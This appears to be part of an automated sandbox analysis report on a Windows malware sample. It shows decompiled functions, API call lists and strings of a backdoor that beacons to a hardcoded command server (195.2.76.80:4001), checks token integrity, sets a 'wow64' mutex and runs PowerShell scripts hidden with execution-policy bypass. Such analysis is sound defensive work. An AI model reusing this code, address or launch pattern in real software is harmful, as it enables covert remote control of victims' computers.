									_t205 = E004025D9(0x405081, 0x32, _t315, 4);
								}
								goto L66;
							}
							_t205 = E00402A1E(__eflags, _v936, _v64, 0x10000, 0);
							__eflags = _t205;
							if(_t205 <= 0) {
								goto L67;
							}
							_v1788 = 1;
							_v80 = _t205;
							E00402B1C( &_v64,  &_v84, 4);
							goto L62;
						}
						goto L17;
					}
				}
				_t205 = VirtualAlloc(0, 0x10000, 0x3000, 4); // executed
				if(_t205 == 0) {
					goto L67;
				} else {
					_v64 = _t205;
					goto L3;
				}
			}

0x0040197f
0x00401996
0x004019a8
0x004019b2
0x004019d2
0x004019e0
0x004019e5
0x004019e7
0x00402031
0x00402037
0x0040203c
0x00402042
0x00402047
0x00402047
0x0040204d
0x00402050
0x00402050
0x00402050
0x00402053
0x00402053
0x00402060
0x00402060
0x0040206a
0x00402073
0x0040207c
0x00402081
0x00402088
0x0040208f
0x00402096
0x00402096
0x004020a5
0x004020a5
0x004019ed
0x004019f0
0x004019f3
0x004019f9
0x004019fd
0x004019fe
0x00401a00
0x00401a14
0x00401a19
0x00401a1b
0x00000000
0x00000000
0x00401a21
0x00401a28
0x00401a2f
0x00401a39
0x00401a43
0x00401a4d
0x00401a4f
0x00401a57
0x00401a58
0x00401a5a
0x00401a5c
0x00401a64
0x00401a65
0x00401a6a
0x00401a70
0x00401a80
0x00401a8a
0x00401a8e
0x00401a9a
0x00401a9c
0x00401a9c
0x00401aa5
0x00401aa8
0x00401abe
0x00401ad0
0x00401ae6
0x00000000
0x00401aeb
0x00401aeb
0x00401b0a
0x00401b12
0x00401b13
0x00401b15
0x00401b17
0x00401b1a
0x00401b1b
0x00401b1d
0x00401b25
0x00000000
0x00000000
0x00401b2d
0x00000000
0x00000000
0x00401b33
0x00000000
0x00401b46
0x00401b46
0x00000000
0x00401b46
0x00401b33
0x00401b52
0x00401b55
0x00401b59
0x00401b68
0x00401b68
0x00401b6d
0x00401bab
0x00401baf
0x00401be0
0x00401be0
0x00401be7
0x00401be9
0x00401bec
0x00401bee
0x00401bee
0x00401bfa
0x00401bff
0x00401c02
0x00401c05
0x00401c12
0x00401c17
0x00401c1a
0x00401f98
0x00401f98
0x0040202c
0x00000000
0x00401c20
0x00401c30
0x00401c35
0x00401c39
0x00401c3d
0x00401eab
0x00401eae
0x00401f8c
0x00401f91
0x00401f91
0x00000000
0x00401f91
0x00401ec2
0x00401ec7
0x00401ec9
0x00000000
0x00000000
0x00401ecf
0x00401ed8
0x00401ee3
0x00401ee9
0x00401ef1
0x00401eff
0x00401f04
0x00401f0a
0x00401f10
0x00401f16
0x00401f1a
0x00401f29
0x00401f2b
0x00401f2d
0x00401f2f
0x00401f1c
0x00401f1c
0x00401f1e
0x00401f20
0x00401f22
0x00401f22
0x00401f34
0x00401f3b
0x00401f45
0x00401f4d
0x00401f4e
0x00401f50
0x00401f52
0x00401f59
0x00401f71
0x00000000
0x00401f71
0x00401c43
0x00401c46
0x00401c4a
0x00401c4f
0x00401c5a
0x00401c7a
0x00401c7a
0x00401c7a
0x00401c7c
0x00000000
0x00000000
0x00401c61
0x00401c66
0x00401c79
0x00401c79
0x00000000
0x00401c79
0x00401c68
0x00401c6c
0x00401c72
0x00000000
0x00401c72
0x00401c7e
0x00401c85
0x00401c8c
0x00401c93
0x00401c9e
0x00401ca3
0x00401cab
0x00401cad
0x00401cb4
0x00401cbb
0x00401cc2
0x00401cc2
0x00401cc9
0x00401cd1
0x00401cd3
0x00401cda
0x00401ce1
0x00401ce8
0x00401ce8
0x00401cef
0x00401cf7
0x00401cf9
0x00401d00
0x00401d07
0x00401d0e
0x00401d0e
0x00401d15
0x00401d1d
0x00401d1f
0x00401d26
0x00401d2d
0x00401d34
0x00401d34
0x00401d46
0x00401d4b
0x00401d50
0x00401e9a
0x00401ea1
0x00000000
0x00401d56
0x00401d56
0x00401d5c
0x00401d5f
0x00401d72
0x00401d84
0x00401d9b
0x00401da0
0x00401da9
0x00401dae
0x00401dae
0x00401db4
0x00401dbc
0x00401dbc
0x00401dbf
0x00401dc6
0x00401dc9
0x00401dca
0x00401dca
0x00401dca
0x00401dd1
0x00401dd2
0x00401dd9
0x00401de3
0x00401dea
0x00401e14
0x00401e1c
0x00401e1d
0x00401e21
0x00401e22
0x00401e2c
0x00401e95
0x00401e2e
0x00401e3c
0x00401e49
0x00401e5e
0x00401e7c
0x00401e7c
0x00000000
0x00401e2c
0x00401d50
0x00401c1a
0x00401bc1
0x00401bc6
0x00401bc8
0x00000000
0x00000000
0x00401bce
0x00401bdb
0x00000000
0x00401bdb
0x00401b6f
0x00401b72
0x00401b89
0x00401b89
0x00401b8d
0x00401b95
0x00401b9b
0x00401b9b
0x00000000
0x00401b95
0x00401b74
0x00401b78
0x00000000
0x00000000
0x00401b7a
0x00000000
0x00401b7a
0x00401b5b
0x00401b62
0x00401fa7
0x00401fab
0x00401fe2
0x00401fe2
0x00401fed
0x00401ff3
0x00401ff6
0x00401ff8
0x00401ff8
0x00402003
0x00402008
0x0040200b
0x0040200e
0x00402014
0x0040201b
0x00402027
0x00402027
0x00000000
0x0040201b
0x00401fbd
0x00401fc2
0x00401fc4
0x00000000
0x00000000
0x00401fc6
0x00401fd0
0x00401fdd
0x00000000
0x00401fdd
0x00000000
0x00401b62
0x00401aeb
0x004019c2
0x004019c9
0x00000000
0x004019cf
0x004019cf
0x00000000
0x004019cf

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,?,?,004015C1,?,?,?,4001,000000FF), ref: 004019A3
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?,?,?,?,?,004015C1,?), ref: 004019C2
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?,?,?,?,?,004015C1,?), ref: 004019E0
GetUserNameExA.SECUR32(00000002,?,?,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 00401A00
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00401A70
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00405081,?,00000032), ref: 00401ABE
select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,00000078,00000000,?,00000000,00000002,?,?,00000000), ref: 00401B1D
GetTempPathA.KERNEL32(00000200,?,?,?,00000007,?,00405081,00000032,3173702E,00000004,00405081,00000032,?,00000003,00000023,?), ref: 00401DA9

Part of subcall function 004020A8: CoInitialize.OLE32(00000000), ref: 004020DC
Part of subcall function 004020A8: CoCreateInstance.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,00000000,?,?,?,?), ref: 0040211D

VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00405081,00000032,?,00000000,?,00000000,00000002,?,?,00000000,?,?), ref: 00401EC2
socket.WSOCK32(00000002,00000001,00000006,?,00000188,00000004,?,00000000,00000180,00000000,00010000,00003000,00000004,00405081,00000032,?), ref: 00401F22
socket.WSOCK32(00000017,00000001,00000006,?,00000188,00000004,?,00000000,00000180,00000000,00010000,00003000,00000004,00405081,00000032,?), ref: 00401F2F
setsockopt.WSOCK32(?,00000006,00000001,00000001,00000004,00000017,00000001,00000006,?,00000188,00000004,?,00000000,00000180,00000000,00010000), ref: 00401F59
CreateThread.KERNEL32 ref: 00401F6C
CloseHandle.KERNEL32(?,?,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 0040206A
ExitProcess.KERNEL32(00000000,wow64), ref: 00402096

Part of subcall function 00402A1E: select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00402A50
Part of subcall function 00402A1E: recv.WSOCK32(?,?,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00402A65

Strings

powershell, xrefs: 00401E6E
-WindowStyle Hidden -ep bypass -file ", xrefs: 00401E37
wow64, xrefs: 0040208A
.ps1, xrefs: 00401D15
exe, xrefs: 00401DD2, 00401DD8

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocCreateVirtual$selectsocket$CloseEventExitHandleInformationInitializeInstanceIoctlNamePathProcessTempThreadUserVolumerecvsetsockopt
String ID: -WindowStyle Hidden -ep bypass -file "$.ps1$exe$powershell$wow64
API String ID: 345091395-1962433723
Opcode ID: 96ff7280035b0c6e6356c7f94e49e24bce25d0cb4d843013276e80d5d20d158e
Instruction ID: 722c77b160f5ee40301f9ae5c946d5cd53ffeaa08266815bf15082fc84fa5205
Opcode Fuzzy Hash: 96ff7280035b0c6e6356c7f94e49e24bce25d0cb4d843013276e80d5d20d158e
Instruction Fuzzy Hash: 4812A470D44318AEEB319BA0CC45F9AB778AF04704F1041ABF6587A1D1D7F96A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004026A1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 78
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026A1(intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				struct _WNDCLASSA _v48;
				struct HWND__* _v52;
				struct tagMSG _v80;
				char _v336;
				char _v592;
				struct HWND__* _t44;
				void* _t55;
				void* _t56;

				E00402BA3( &_v592, _t55 - _t56);
				E00402BBA("Microsoft", 0xa,  &_v336);
				E00402BBA("win32app", 9,  &_v592);
				_v8 = GetModuleHandleA(0);
				_v48.style = 0;
				_v48.lpfnWndProc = _a4;
				_v48.cbClsExtra = 0;
				_v48.cbWndExtra = 0;
				_v48.hInstance = _v8;
				_v48.lpszMenuName = 0;
				_v48.lpszClassName =  &_v592;
				_v48.hIcon = LoadIconA(0, 0x7f04);
				_v48.hCursor = LoadCursorA(0, 0x7f01);
				_v48.hbrBackground = 6;
				RegisterClassA( &_v48);
				_t44 = CreateWindowExA(0x80,  &_v592,  &_v336, 0xc80000, 0xfa0, 0xfa0, 0x1f4, 0x96, 0, 0, _v8, 0); // executed
				_v52 = _t44;
				ShowWindow(_v52, 1); // executed
				UpdateWindow(_v52);
				L1:
				GetMessageA( &_v80, 0, 0, 0);
				TranslateMessage( &_v80);
				DispatchMessageA( &_v80);
				goto L1;
			}

APIs

GetModuleHandleA.KERNEL32(00000000,win32app,00000009,?,Microsoft,0000000A,?,?), ref: 004026E2
LoadIconA.USER32(00000000,00007F04), ref: 00402722
LoadCursorA.USER32 ref: 00402731
RegisterClassA.USER32 ref: 00402744
CreateWindowExA.USER32 ref: 0040277E
ShowWindow.USER32(?,00000001,00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000,00000000,00000000), ref: 0040278B
UpdateWindow.USER32(?), ref: 00402793
GetMessageA.USER32 ref: 004027A2
TranslateMessage.USER32(?), ref: 004027AB
DispatchMessageA.USER32 ref: 004027B4

Strings

win32app, xrefs: 004026D6
Microsoft, xrefs: 004026C3

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: MessageWindow$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
String ID: Microsoft$win32app
API String ID: 1919798786-2644191155
Opcode ID: fe1a89c82acfa9335293fc2587ea0468b61e365bd776cea69594b540cde8141b
Instruction ID: d957c1f4cb42465741694de127319c0437f6bb7ea5b588441986ba897e742e48
Opcode Fuzzy Hash: fe1a89c82acfa9335293fc2587ea0468b61e365bd776cea69594b540cde8141b
Instruction Fuzzy Hash: 36311971E40309BAEB50EFE5CD4AFDEB7B8AB04704F50406AF608BA1C1D7F866049B59

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_(void* __eflags) {
				char _v1028;
				intOrPtr _v1036;
				void* _v1052;
				char _v1056;
				int _t7;
				void* _t13;
				void* _t15;
				void* _t26;
				void* _t29;

				_t29 = __eflags;
				 *0x40523b = GetModuleHandleA(0);
				_t7 = GetCommandLineA();
				 *0x405237 = _t7;
				_push(0xa);
				_push( *0x405237);
				_push(0);
				_push( *0x40523b); // executed
				L1(); // executed
				ExitProcess(_t7);
				E00402BA3( &_v1056, _t26 - _t26 + 0xfffffbf4);
				CreateThread(0, 0, E004026A1, E004027BF, 0, 0); // executed
				_v1052 = OpenMutexA(0x100000, 0, "wow64");
				CreateMutexA(0, 0, "wow64"); // executed
				_t13 = E00402938(_t29, "start"); // executed
				if(_t13 == 0) {
					L4:
					EnumWindows(E00402487, 0);
					_t15 = E0040287E();
					_t32 = _t15 - 0x1000;
					if(_t15 == 0x1000) {
						goto L3;
					}
					GetModuleFileNameA(0,  &_v1028, 0x100);
					E004020A8(_t32, "wow64", 0,  &_v1028, "start", 0, 1);
				} else {
					if(_v1036 == 0) {
						L3:
						E00401549(); // executed
						goto L4;
					}
				}
				Sleep(0xea60);
				return 0;
			}

0x00401000
0x00401007
0x0040100c
0x00401011
0x00401016
0x00401018
0x0040101e
0x00401020
0x00401026
0x0040102c
0x00401045
0x0040105c
0x00401072
0x00401081
0x0040108b
0x00401092
0x004010a2
0x004010a9
0x004010ae
0x004010b3
0x004010b8
0x00000000
0x00000000
0x004010c8
0x004010e4
0x00401094
0x0040109b
0x0040109d
0x0040109d
0x00000000
0x0040109d
0x0040109b
0x004010ee
0x004010f6

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401002
GetCommandLineA.KERNEL32(00000000), ref: 0040100C

Part of subcall function 00401031: CreateThread.KERNEL32 ref: 0040105C
Part of subcall function 00401031: OpenMutexA.KERNEL32 ref: 0040106D
Part of subcall function 00401031: CreateMutexA.KERNEL32(00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF,00000000,00000000,?,?,?,0040102B), ref: 00401081
Part of subcall function 00401031: EnumWindows.USER32(00402487,00000000), ref: 004010A9
Part of subcall function 00401031: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF), ref: 004010C8
Part of subcall function 00401031: Sleep.KERNEL32(0000EA60,wow64,00000000,?,start,00000000,00000001,00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64), ref: 004010EE

ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 0040102C

Strings

wow64, xrefs: 00401061, 00401078, 004010DF
start, xrefs: 00401086, 004010D1

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateModuleMutex$CommandEnumExitFileHandleLineNameOpenProcessSleepThreadWindows
String ID: start$wow64
API String ID: 1568676575-53727345
Opcode ID: 2ed2c4931bade1cbab40740b7c2dbb0ba7b01608394372d4fa7b451d2fe8b616
Instruction ID: ace778f0473b3a1fa986809811a169bd3f6c5b888043eb8d59eeb0af0fc7eb98
Opcode Fuzzy Hash: 2ed2c4931bade1cbab40740b7c2dbb0ba7b01608394372d4fa7b451d2fe8b616
Instruction Fuzzy Hash: 8311427078470579EB61BBB28E47F5E3168AB04B49F24047FB744B90D1DAFC5680992E

Uniqueness

Uniqueness Score: -1.00%

Function 0040287E, Relevance: 15.1, APIs: 10, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040287E() {
				void* _v8;
				void** _v16;
				long _v20;
				long _v24;
				int _t30;

				_v24 = 0;
				_v20 = 8;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_v16 = LocalAlloc(0, _v20);
					_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
					if(_v20 > 8) {
						LocalFree(_v16);
						_v16 = LocalAlloc(0, _v20);
						_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
					}
					if(_t30 != 0 && GetSidSubAuthority( *_v16, 0) != 0) {
						E00402B1C(_t34,  &_v24, 4);
					}
					LocalFree(_v16);
					CloseHandle(_v8); // executed
				}
				return _v24;
			}

0x00402887
0x0040288e
0x004028aa
0x004028ba
0x004028cc
0x004028d5
0x004028da
0x004028e9
0x004028fb
0x004028fb
0x00402902
0x0040291b
0x0040291b
0x00402923
0x0040292b
0x0040292b
0x00402937

APIs

GetCurrentProcess.KERNEL32 ref: 00402895
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 004028A3
LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?), ref: 004028B5
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?), ref: 004028CC
LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028DA
LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028E4
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 004028FB
GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040290B
LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00402923
CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040292B

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Local$Token$AllocFreeInformationProcess$AuthorityCloseCurrentHandleOpen
String ID:
API String ID: 1358183241-0
Opcode ID: 48fcc9b0c832dd6d096bc34ff97a7db52107236acb17e10917358097f5860b7b
Instruction ID: 659c31aa751460ccb818eaa5a6d65241a666f7eaca525ead9889415a3a5bdf7f
Opcode Fuzzy Hash: 48fcc9b0c832dd6d096bc34ff97a7db52107236acb17e10917358097f5860b7b
Instruction Fuzzy Hash: 67116771E0010DBADF11AFE1CD02FAFBB79AB44309F00402AB210B50E5DBB94B14AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401031, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
sleepsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401031() {
				char _v1028;
				void* _v1036;
				char _v1040;
				void* _t11;
				void* _t13;
				void* _t21;
				void* _t22;
				void* _t23;

				E00402BA3( &_v1040, _t21 - _t22);
				CreateThread(0, 0, E004026A1, E004027BF, 0, 0); // executed
				_v1036 = OpenMutexA(0x100000, 0, "wow64");
				CreateMutexA(0, 0, "wow64"); // executed
				_t11 = E00402938(_t23, "start"); // executed
				if(_t11 == 0) {
					L3:
					EnumWindows(E00402487, 0);
					_t13 = E0040287E();
					_t26 = _t13 - 0x1000;
					if(_t13 == 0x1000) {
						goto L2;
					}
					GetModuleFileNameA(0,  &_v1028, 0x100);
					E004020A8(_t26, "wow64", 0,  &_v1028, "start", 0, 1);
				} else {
					if(_v1036 == 0) {
						L2:
						E00401549(); // executed
						goto L3;
					}
				}
				Sleep(0xea60);
				return 0;
			}

APIs

CreateThread.KERNEL32 ref: 0040105C
OpenMutexA.KERNEL32 ref: 0040106D
CreateMutexA.KERNEL32(00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF,00000000,00000000,?,?,?,0040102B), ref: 00401081

Part of subcall function 00402938: GetCommandLineW.KERNEL32(?,?), ref: 00402954
Part of subcall function 00402938: CommandLineToArgvW.SHELL32(00000000,?,?,?), ref: 00402962

EnumWindows.USER32(00402487,00000000), ref: 004010A9
GetModuleFileNameA.KERNEL32(00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF), ref: 004010C8
Sleep.KERNEL32(0000EA60,wow64,00000000,?,start,00000000,00000001,00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64), ref: 004010EE

Part of subcall function 00401549: Sleep.KERNEL32(00002710,?), ref: 00401567
Part of subcall function 00401549: WSAStartup.WSOCK32(00000202,?,00002710,?), ref: 00401578
Part of subcall function 00401549: Sleep.KERNEL32(0002BF20,?,?,?,4001,000000FF,?,00000202,?,00002710,?), ref: 004015EE

Strings

wow64, xrefs: 00401061, 00401078, 004010DF
start, xrefs: 00401086, 004010D1

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Sleep$CommandCreateLineMutex$ArgvEnumFileModuleNameOpenStartupThreadWindows
String ID: start$wow64
API String ID: 4100216516-53727345
Opcode ID: a37fbc2df056d4998a164247cbb34f85eb39d659c2c6f45cf3c02cd01d33a8de
Instruction ID: 293ce2b1b78586e2bd88d1d0124769ce59921d79aa433574afd859985a6aaea9
Opcode Fuzzy Hash: a37fbc2df056d4998a164247cbb34f85eb39d659c2c6f45cf3c02cd01d33a8de
Instruction Fuzzy Hash: 250184717C430575EA71B6A28E4BFAE71589B04F49F24047FB745B90C2D9FCA680892E

Uniqueness

Uniqueness Score: -1.00%

Function 0072003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0072024D

Strings

kernel32.dll, xrefs: 0072008F, 00720095
cess, xrefs: 0072018D

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: d7e7086047b3f8159a3cb486fec6a01ff9917c5366d1e700a68e5cee74cd9536
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 93527A74A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E50DAB352DB34AE94DF64

Uniqueness

Uniqueness Score: -1.00%

Function 004010F9, Relevance: 10.6, APIs: 7, Instructions: 90
networkCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E004010F9(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				char _v28;
				intOrPtr _v40;
				short _v42;
				char _v44;
				char _v300;
				char _v304;
				char _v308;
				char _t32;
				short _t40;
				char* _t46;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t32 = E00402BA3( &_v308,  &_v16 - _t52);
				_push(6);
				_push(1);
				_push(2); // executed
				L004030B4(); // executed
				_v8 = _t32;
				E00402B1C( &_v8, _a4, 4);
				_v304 = 1;
				_push(4);
				_push( &_v304);
				_push(1);
				_push(6);
				_push(_v8);
				L004030A8(); // executed
				E00402BBA(_a8, 0xffffffff,  &_v300);
				_v40 = E00402A90(_t53,  &_v300, 2);
				_t40 = _a12;
				if(_t40 > 0x10000) {
					_t40 = E00402B34(_t40);
				}
				_push(_t40);
				L0040308A();
				_v42 = _t40;
				_v44 = 2;
				_v304 = 1;
				_push( &_v304);
				_push(0x8004667e);
				_push(_v8);
				L00403090(); // executed
				_push(0x10);
				_push( &_v44);
				_push(_v8);
				L00403084(); // executed
				E00402B69(_v8, 0,  &_v28, _a16, 0);
				_push( &_v16);
				_push(0);
				_t46 =  &_v28;
				_push(_t46);
				_push(0);
				_push(0); // executed
				L0040309C(); // executed
				if(_t46 == 1) {
					_v304 = 0;
					_push( &_v304);
					_push(0x8004667e);
					_push(_v8);
					L00403090(); // executed
					_v308 = 1;
				}
				return _v308;
			}

APIs

socket.WSOCK32(00000002,00000001,00000006,?,?,?,?), ref: 0040111B
setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?), ref: 0040114B

Part of subcall function 00402A90: getaddrinfo.WS2_32(?,00000000,?,?), ref: 00402AD8

htons.WSOCK32(?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001), ref: 00401183
ioctlsocket.WSOCK32(?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 004011AB
connect.WSOCK32(?,?,00000010,?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?), ref: 004011B9
select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 004011DF
ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 00401202

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ioctlsocket$connectgetaddrinfohtonsselectsetsockoptsocket
String ID:
API String ID: 783190390-0
Opcode ID: 19adc19e929b2a08f67d15c10b69d013088360af49bec7d281048062d258119f
Instruction ID: fd7f7d9d9863c24d04b1f11d191c8144f26a613158dfe5fb9220a3805e5880d9
Opcode Fuzzy Hash: 19adc19e929b2a08f67d15c10b69d013088360af49bec7d281048062d258119f
Instruction Fuzzy Hash: B1311A71900208BADF10EFA1CD46FDEBBBDEB04318F1040AAF604B60D1D7B59B549B69

Uniqueness

Uniqueness Score: -1.00%

Function 00401549, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41
sleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401549() {
				char _v402;
				char* _v412;
				char _v420;
				intOrPtr _v424;
				char _v440;
				char* _t14;
				void* _t19;
				void* _t22;
				void* _t23;
				void* _t24;

				E00402BA3( &_v440, _t23 - _t24);
				do {
					Sleep(0x2710); // executed
					_t14 =  &_v402;
					_push(_t14);
					_push(0x202); // executed
					L00403078(); // executed
					_t26 = _t14;
				} while (_t14 != 0);
				_v412 = "195.2.76.80";
				E00402BBA("4001", 0xffffffff,  &_v420);
				_v424 = E00402B34( &_v420);
				while(1) {
					L3:
					_t19 = E0040197F(_t22, _t26, _v412, _v424); // executed
					if(_t19 != 0) {
						break;
					}
					_t26 = _v412 - "195.2.76.80";
					if(_v412 != "195.2.76.80") {
						_v412 = "195.2.76.80";
					} else {
						_v412 = "195.2.76.80";
					}
				}
				Sleep(0x2bf20);
				goto L3;
			}

0x0040155d
0x00401562
0x00401567
0x0040156c
0x00401572
0x00401573
0x00401578
0x0040157d
0x0040157d
0x00401581
0x00401599
0x004015aa
0x004015b0
0x004015b0
0x004015bc
0x004015c3
0x00000000
0x00000000
0x004015c5
0x004015cf
0x004015dd
0x004015d1
0x004015d1
0x004015d1
0x004015e7
0x004015ee
0x00000000

APIs

Sleep.KERNEL32(00002710,?), ref: 00401567
WSAStartup.WSOCK32(00000202,?,00002710,?), ref: 00401578
Sleep.KERNEL32(0002BF20,?,?,?,4001,000000FF,?,00000202,?,00002710,?), ref: 004015EE

Strings

195.2.76.80, xrefs: 00401581, 004015C5, 004015DD
195.2.76.80, xrefs: 004015D1
4001, xrefs: 00401594

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Sleep$Startup
String ID: 195.2.76.80$195.2.76.80$4001
API String ID: 3152138391-3751687743
Opcode ID: 553c6b6c76171cabc69860c1b09cc0c34d0cb1101737d3f42c204dc70b906f18
Instruction ID: 8aa3222b7a54f4c441c47007d6b20f582d72c68b87d4c1fdf5df5a18c5f8f8b8
Opcode Fuzzy Hash: 553c6b6c76171cabc69860c1b09cc0c34d0cb1101737d3f42c204dc70b906f18
Instruction Fuzzy Hash: 3801B970901218BADF10AF518C5AEEE767CAF41304F5041BBB549B50D1DB789B848E5F

Uniqueness

Uniqueness Score: -1.00%

Function 004027BF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25networkCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,0000004A,?,?), ref: 004027D7
WSACleanup.WSOCK32(wow64), ref: 004027E8
ExitProcess.KERNEL32(00000000,wow64), ref: 00402F46

Strings

wow64, xrefs: 004027DE
J, xrefs: 004027C5

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CleanupExitProcProcessWindow
String ID: J$wow64
API String ID: 4061260214-814445302
Opcode ID: e32ebfc82eda18ede8322e5ae3b1bac7218c60a817a316be659b716cb8d215b0
Instruction ID: e471e3a03143c4bf4ba43927f2f51144a9331e572b3d25a362d2f399fd237b2a
Opcode Fuzzy Hash: e32ebfc82eda18ede8322e5ae3b1bac7218c60a817a316be659b716cb8d215b0
Instruction Fuzzy Hash: D4E04831104119B6CB016E969D4AE9F3A29EB11395F108437FA15340D145FD4951BA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402997, Relevance: 6.1, APIs: 4, Instructions: 53
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402997(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				char _v8;
				char _v28;
				char* _t20;
				intOrPtr _t24;

				_v8 = 0xa;
				if(_a16 != 0) {
					WaitForSingleObject(_a16, 0xffffffff);
				}
				_t24 = _a8;
				while(_a12 != 0) {
					E00402B69(_a4, 0,  &_v28, 0, 0);
					_push(0);
					_push(0);
					_t20 =  &_v28;
					_push(_t20);
					_push(0);
					_push(0); // executed
					L0040309C(); // executed
					if(_t20 == 1) {
						_push(0);
